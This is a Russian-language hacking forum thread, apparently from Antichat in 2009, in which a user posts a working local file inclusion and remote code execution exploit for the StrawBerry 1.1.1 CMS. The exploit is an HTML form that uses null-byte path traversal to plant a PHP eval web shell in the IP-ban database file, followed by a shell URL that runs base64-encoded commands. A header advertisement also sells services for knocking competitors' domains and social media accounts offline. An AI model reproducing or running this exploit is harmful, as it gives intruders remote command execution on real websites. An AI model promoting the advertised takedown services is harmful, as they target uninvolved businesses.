Есть ли сплоит для Strawberry 1.1.1 ?

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Есть ли сплоит для Strawberry 1.1.1 ?

Опции темы

Поиск в этой теме

Опции просмотра

StrawBerry 1.1.1 LFI / Remote Code Execution Exploit

10.05.2009, 13:09

[AVT]

Новичок

Регистрация: 20.12.2007

Сообщений: 19

С нами: 9680237

Репутация: 52

StrawBerry 1.1.1 LFI / Remote Code Execution Exploit

Развивая тему _http://forum.antichat.ru/showpost.php?p=953944&postcount=71

Выполняем POST-запрос:

Код:

<form method="post" action="http://localhost/strawberry/example/index.php?do=../../../../../inc/mod/ipban.mdu%00">
<input type="text" name="add_ip" value="<h1><?php eval(base64_decode($_GET[cmd]));?></h1>">
<input type="hidden" name="action" value="add">
<input type="hidden" name="mod" value="ipban">
<input type="submit" value="First time">
</form>

Шелл: http://localhost/strawberry/example/index.php?cmd=cGhwaW5mbygpOw==&do=../../../../db/base/ipban.MYD%00

+ Не нужно расшифровывать md5(md5()) хеш админа.

Уточнение: "/example/" - это не пример каталога, а папка в движке StrawBerry.

Последний раз редактировалось [AVT]; 10.05.2009 в 13:44..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
«Лаборатории Касперского»: Количество вредоносных программ под Linux резко возросло	dinar_007	Мировые новости. Обсуждения.	9	20.08.2006 20:50

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules